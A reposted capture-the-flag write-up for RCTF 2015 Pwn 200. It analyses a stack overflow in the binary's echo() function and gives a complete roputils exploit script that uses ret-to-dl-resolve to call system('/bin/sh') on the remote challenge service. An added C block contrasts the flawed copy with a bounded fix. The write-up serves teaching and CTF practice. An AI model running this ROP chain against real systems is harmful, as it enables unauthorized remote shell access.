RCTF 2015 Pwn 200

admin | 2021-09-01 14:34:05


Last updated: Nov. 15, 2015 CST 20:26:43

An x86_64 program without libc, protected with NX and possibly ASLR. A stack overflow can easily be found in the function echo():

Location of problem

The buffer on the stack is only 0x20 bytes, while we can supply a string length of 0x400 with contents that are completely controllable. Ret-to-dl-resolve will also be used to escape from NX.

However, echo() stops copying as soon as it meets a 0x00 byte. After reconsidering the stack layout, this is not a big obstacle: our data is also stored on the stack, and on x86_64 arguments are not passed on the stack (at least in this function), so we can simply make the copy stop at a chosen point and then pop again to reach our own ROP chain. Even though it might be stripped in echo(), we do not actually need to take that into account.
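To make the bug concrete, here is an added example that is not part of the original write-up or the challenge binary: an assumed reconstruction of the echo() copy pattern described above (0x20-byte stack destination, caller-chosen length up to 0x400, copy that stops only at a NUL) beside a bounded version, with helpers that count how many bytes each variant would write for the same constructed request.

```c
#include <stddef.h>
#include <string.h>

#define ECHO_BUF    0x20   /* stack buffer size stated in the write-up */
#define ECHO_MAXLEN 0x400  /* maximum caller-controlled length */

/* Assumed reconstruction of the bug pattern (not the challenge's own code):
 * copy up to `len` bytes, stopping only at a NUL, with no check against
 * the real size of `dst`. Returns bytes written. */
size_t echo_vulnerable(char *dst, const char *src, size_t len) {
    size_t i;
    for (i = 0; i < len && src[i] != '\0'; i++)
        dst[i] = src[i];
    return i;
}

/* Hardened variant: bound the copy by the destination size and always
 * NUL-terminate. Returns bytes written, excluding the terminator. */
size_t echo_fixed(char *dst, size_t dst_size, const char *src, size_t len) {
    size_t i, limit = dst_size ? dst_size - 1 : 0;
    if (len > limit)
        len = limit;
    for (i = 0; i < len && src[i] != '\0'; i++)
        dst[i] = src[i];
    if (dst_size)
        dst[i] = '\0';
    return i;
}

/* Constructed input: ECHO_MAXLEN bytes of 'a' with a NUL at `nul_at`
 * (no NUL inside the request when nul_at >= ECHO_MAXLEN). */
static void build_input(char *src, size_t nul_at) {
    memset(src, 'a', ECHO_MAXLEN);
    src[ECHO_MAXLEN] = '\0';
    if (nul_at < ECHO_MAXLEN)
        src[nul_at] = '\0';
}

/* Bytes the vulnerable copy writes for a `len`-byte request; the scratch
 * destination is oversized so the count is observed without corruption. */
size_t vulnerable_write_count(size_t len, size_t nul_at) {
    char src[ECHO_MAXLEN + 1], scratch[ECHO_MAXLEN + 1];
    build_input(src, nul_at);
    return echo_vulnerable(scratch, src, len);
}

/* Same request against a real ECHO_BUF-byte destination with the fix. */
size_t fixed_write_count(size_t len, size_t nul_at) {
    char src[ECHO_MAXLEN + 1], buf[ECHO_BUF];
    build_input(src, nul_at);
    return echo_fixed(buf, sizeof buf, src, len);
}
```

A 0x400-byte request with no NUL makes the unchecked copy write 0x400 bytes into a 0x20-byte buffer, while an early NUL cuts the copy short exactly as the write-up relies on; the bounded version never writes more than 0x1f bytes plus the terminator.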

The exp script is as below.

Thanks to Bigtang for showing me this way to bypass its protection.

Thanks to roputils for its excellent script.

# Layout of the first payload: "a"*24 -> pop4+ret -> [ROP jobs]
from roputils import *

offset = 32
fpath = './pwn200'
#p = Proc(rop.fpath)                        # local run
p = Proc(host='180.76.178.48', port=6666)   # remote challenge service

rop = ROP(fpath)
addr_stage = rop.section('.bss') + 0x400    # writable staging area for the second stage
ptr_ret = rop.search(rop.section('.fini'))  # pointer to .fini, used as a return target

# 24 bytes of padding, then the pop4+ret gadget address (0x40089c) as a little-endian qword;
# echo() stops copying at the first 0x00, so the chain continues after the gadget pops
buf = 'a'*24 + '\x9c\x08\x40\x00\x00\x00\x00\x00'
buf += rop.call_chain_ptr(          # ROP chain: leak an address, then read the second stage
    ['write', 1, rop.got()+8, 8],   # write the pointer stored at GOT+8 (link_map) to stdout
    ['read', 0, addr_stage, 420]    # read the second stage into the staging area
, pivot=addr_stage)                 # pivot the stack to the staging area
buf += rop.fill(0x100, buf)

p.write(buf)
p.read(16)
addr_link_map = p.read_p64()
print("link_map is at %s" % hex(addr_link_map))
addr_dt_debug = addr_link_map + 0x1c8       # DT_DEBUG entry inside the link_map

# Second stage: read 8 bytes (the zero written below) into DT_DEBUG, then call dl_resolve
buf = rop.call_chain_ptr(
    ['read', 0, addr_dt_debug, 8],
    [ptr_ret, addr_stage+400]
)
buf += rop.dl_resolve_call(addr_stage+300)
buf += rop.fill(300, buf)
buf += rop.dl_resolve_data(addr_stage+300, 'system')   # fake resolution data for 'system'
buf += rop.fill(400, buf)
buf += rop.string('/bin/sh')                           # argument string at addr_stage+400
buf += rop.fill(420, buf)

p.write(buf)
p.write_p64(0)      # the 8 bytes consumed by the read into DT_DEBUG
p.interact(0)

From: blog.iret.xyz | Author: blog.iret.xyz


Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site bears no legal or joint liability. For any issue, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the mail is not intercepted; contact details are on the home page).
Please keep this link when reposting (CN-SEC: thanks to the original author for their work): RCTF 2015 Pwn 200 https://cn-sec.com/archives/499506.html